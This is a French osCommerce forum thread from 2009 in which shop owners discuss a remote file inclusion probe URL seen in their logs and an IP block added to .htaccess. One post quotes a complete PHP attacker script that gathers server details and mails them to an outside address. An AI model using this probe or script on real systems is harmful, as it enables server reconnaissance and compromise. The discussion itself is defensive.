osCommerce France : Accueil Forum Portail osCommerce France Réponses aux questions Foire aux contributions

Bienvenue invité ( Connexion | Inscription )

 
Reply to this topicStart new topic
> [RESOLUT] /index.php?_SERVER[DOCUMENT_ROOT]=http://www.mercedesov, Un connecté très bizarre
gotcha5832
posté 15 Mar 2009, 14:03
Message #1


Ceinture orange+ OSC
Icône de groupe

Groupe : Membres
Messages : 343
Inscrit : 27-February 08
Lieu : lune
Membre no 20966



Bonjour à tous.

Voilà j'etait sur who online:
Avec google qui etait là depuis 3H avec un ip 66.249.65.240. Normal.
Quand tout d'un coup, avec la même session, connecter depuis 3h aussi, mais l'adresse ip à change:
94.126.44.72 et l'adresse ou il est est TRES bizarre:
Code
/catalog//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mercedesov


Du coup part sécurité, je vite ajouter à htaccess:
Code
order allow,deny
deny from 94.126.44.72
allow from all


Vous en pensez quoi??

Ce message a été modifié par gotcha5832 - 28 Apr 2009, 06:00.


--------------------
Osc-2.2-ms2-FR
Os : Linux 2.6.24.7-desktop-2mnb
Version PHP : 5.2.5 (Zend : 2.2.0)
Base de données : MySQL 5.0.51a
Serveur HTTP : Apache/2.2.8 (Mandriva Linux/PREFORK-6.1mdv2008.1)
Go to the top of the page
 
Rogers
posté 16 Mar 2009, 09:03
Message #2


Ceinture marron OSC
Icône de groupe

Groupe : Modérateurs
Messages : 1816
Inscrit : 14-March 03
Lieu : Beaune (21200)
Membre no 961



Il a essayé certainement un script. Le mieux quand tu vois des adresses de ce type c'est de l'essayer pour voir si ça donne quelque chose. Généralement, ça ne donne rien, donc tu es tranquille. Par précaution, tu as bien fait de mettre cette IP dans le htaccess.


--------------------
The hardest thing in this world is to live in it.

Force jaune devant, marron derrière

J'ai touché le fond de la piscine
Dans ton petit pull marine...
Go to the top of the page
 
gotcha5832
posté 16 Mar 2009, 11:53
Message #3


Ceinture orange+ OSC
Icône de groupe

Groupe : Membres
Messages : 343
Inscrit : 27-February 08
Lieu : lune
Membre no 20966



Je te remercie.

C'est ce que je voulais entendre.
A vrai dire vu que c'est la première fois que je vois une attaque en live, j'ai peut être over réagit...

Merci de ta réponse


--------------------
Osc-2.2-ms2-FR
Os : Linux 2.6.24.7-desktop-2mnb
Version PHP : 5.2.5 (Zend : 2.2.0)
Base de données : MySQL 5.0.51a
Serveur HTTP : Apache/2.2.8 (Mandriva Linux/PREFORK-6.1mdv2008.1)
Go to the top of the page
 
dvf
posté 16 Mar 2009, 20:16
Message #4


Ceinture orange+ OSC
Icône de groupe

Groupe : Membres
Messages : 346
Inscrit : 21-December 05
Membre no 8273



avec craltrack tu verrais tous les jours tu en as !
Go to the top of the page
 
wumpus
posté 17 Mar 2009, 11:49
Message #5


Ceinture orange OSC
Icône de groupe

Groupe : Membres
Messages : 254
Inscrit : 18-March 04
Lieu : à 20 Km du Havre
Membre no 2148



Code
<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "vulldoeds@gmail.com";
$assunto = "Teste rox das vull do edson!!!";
$email1 = "vulldoeds@gmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>


Voila ce que j'ai trouvé moi avec crawltrack, par contre si le code n'est pas autorisé merci de l'effacer car mes compétences me permettent pas de savoir si il est dangereux ou pas.

Ton attaque : _SERVER[DOCUMENT_ROOT je l'ai eu aussi mais j'arrive pas a retrouver un lien valide sur les adresses que Crawltrack me donne.


--------------------
MS2.2-RC1-FR W3C
Creload 6.0 SP1.2 RC2, Template Thema 5
Go to the top of the page
 

Reply to this topicStart new topic
1 utilisateur(s) sur ce sujet (1 invité(s) et 0 utilisateur(s) anonyme(s))
0 membre(s) :

 



RSS Version bas débit Nous sommes le : 20th May 2013 - 02:36
Ce site est déclaré auprès de la commision Nationale
de l'Informatique et des Libertés (déclaration n°: 1043896)